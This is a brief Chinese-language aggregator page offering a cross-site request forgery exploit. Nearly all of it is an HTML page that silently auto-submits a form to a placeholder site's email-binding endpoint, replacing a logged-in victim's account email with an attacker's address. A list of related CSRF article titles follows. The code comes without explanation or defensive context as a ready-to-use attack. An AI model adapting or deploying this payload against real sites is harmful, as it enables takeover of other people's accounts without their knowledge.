csrf利用EXP

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了csrf利用EXP相关的知识,希望对你有一定的参考价值。

<html>
<body>
<form action="http://www.xxx.com/user/setting/email_bind.html" method="post">
<input type="hiden" name="new_email" value="[email protected]" />
</form>
<script language="text/javascript">
document.forms[0].submit();
</script>
</body>
</html>

以上是关于csrf利用EXP的主要内容,如果未能解决你的问题,请参考以下文章

CSRF漏洞的利用与学习

多步CSRF漏洞场景及其利用

CSRF(跨站点请求伪造)在Flash中的利用

利用BURPSUITE检测CSRF漏洞

20155207 《网络对抗》 Exp9 Web安全基础

Web安全Csrf漏洞利用